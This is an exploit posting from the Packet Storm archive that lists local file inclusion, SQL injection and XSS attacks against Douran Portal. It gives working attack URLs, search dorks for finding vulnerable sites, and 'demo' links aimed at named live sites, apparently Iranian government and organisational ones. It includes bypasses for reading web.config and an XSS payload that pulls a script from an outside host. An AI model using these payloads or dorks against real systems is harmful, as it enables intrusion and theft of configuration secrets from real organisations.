what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Douran Portal LFI / XSS / SQL Injection

Douran Portal LFI / XSS / SQL Injection
Posted Jun 28, 2011
Authored by K0242

Douran Portal suffers from local file inclusion, SQL injection, cross site scripting, and various other vulnerabilities.

tags | exploit, local, vulnerability, xss, sql injection, file inclusion
SHA-256 | c45cc4651417864ce3441187f06f72232833051414c9bd188743398d0bbbf2f5

Douran Portal LFI / XSS / SQL Injection

Change Mirror Download

#########################################################################################################################
# #
# Exploit Title : DOURAN Portal Full Ver Multiple Vulnerabilities #
# #
# Author : K0242 #
# #
# Contact : l3lackhat [at] yahoo [dot] com , l3lackhat.ir [at] gmail [dot] com #
# #
# Portal Link : www.DOURAN.com #
# #
# Tested ON : All ver 0f Douran Portal #
# #
# Security Risk : High #
# #
# Description : All target's iranian GOVerment websites #
# #
# DorK : "DOURAN Portal" #
# #
# OR : "inurl:/Homepage.aspx?site=douranPortal&tabid=1&lang=fa-IR" #
# #
# OR : "inurl:/DesktopModules/News/NewsView.aspx?" #
# #
#########################################################################################################################
# #
# Expl0iTs: #
# #
# 1: www.DOURAN.com/Admin/ImportExport/Download.aspx?filename=../../web.config #
# #
# Dem0 : www.zanjan.agri-jahad.ir/Admin/ImportExport/Download.aspx?filename=../../web.config #
# #
# 2: www.DOURAN.com/download.aspx?FileNameAttach=/web.config #
# #
# Dem0 : www.zanjan.agri-jahad.ir/download.aspx?FileNameAttach=/web.config #
# #
# 3: www.DOURAN.com/DesktopModules/fck/editor/filemanager/upload/test.html #
# #
# Dem0 : www.airport.ir/DesktopModules/fck/editor/filemanager/upload/test.html #
# #
# 4: www.DOURAN.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize=' #
# #
# Dem0 : www.nisoc.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize=' #
# #
# 5: www.DOURAN.com/DesktopModules/Blog/BlogView.aspx #
# #
# Dem0 : www.smcharity.ir/DesktopModules/Blog/BlogView.aspx #
# #
# 6: www.DOURAN.com/DesktopModules/ftb/ftb.imagegallery.aspx #
# #
# Dem0 : www.isbn.ir/DesktopModules/ftb/ftb.imagegallery.aspx #
# #
# 7: www.DOURAN.com/security/DeviceInfo.aspx #
# #
# Dem0 : www.arjco.com/security/DeviceInfo.aspx #
# #
# 8: www.DOURAN.com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=[XSS] #
# #
# Dem0 : rasht.airport.ir/DesktopModules/Gallery/OrderForm.aspx?site=rasht.airport&lang=fa-IR&tabid=0&itemtitle= #
# <script>alert('K0242')</script> #
# #
# 9: www.DOURAN.com/DesktopModules/Gallery/OrderForm.aspx?&site=DouranPortal&lang=fa-IR&tabid=1&itemtitle=[XSS] #
# #
# Dem0 : www.korc.ir/DesktopModules/Gallery/OrderForm.aspx?&site=DouranPortal&lang=fa-IR&tabid=1&itemtitle= #
# <SCRIPT/XSS SRC="http://k0242.persiangig.com/lol.js"></SCRIPT> #
# #
#########################################################################################################################
# #
# <-- More Douran Portal Xpl --> #
# #
# Description : #
# #
# Regarding Attack technique [1], it is possible to bypass the security protections of ?/download.aspx? #
# in Douran Portal and download the hosted files. #
# #
# P0C: #
# #
# Try this first and see the access denied error: #
# #
# www.DOURAN.com/download.aspx?FilePathAttach=/&FileNameAttach=web.config&OriginalAttachFileName=secretfile.txt #
# #
# Now try these to bypass it: #
# #
# 10: www.DOURAN.com/download.aspx?FilePathAttach=/&FileNameAttach=web.config\.&OriginalAttachFileName=secretfile.txt #
# #
# 11: www.DOURAN.com/download.aspx?FilePathAttach=/&FileNameAttach=web.config%20&OriginalAttachFileName=secretfile.txt #
# #
# 12 : www.DOURAN.com/download.aspx?FilePathAttach=/&FileNameAttach=wEB.CoNfiG&OriginalAttachFileName=secretfile.txt #
# #
#########################################################################################################################
# #
# Greetz : TBH | Cyber Terrorist | NOPOTM | IBH | Aria Security | IrCrash | 0utl4wS #
# #
#########################################################################################################################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close